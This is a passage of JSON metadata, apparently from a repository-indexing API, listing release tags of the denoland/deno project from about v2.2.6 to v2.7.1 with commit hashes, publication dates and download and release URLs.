2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2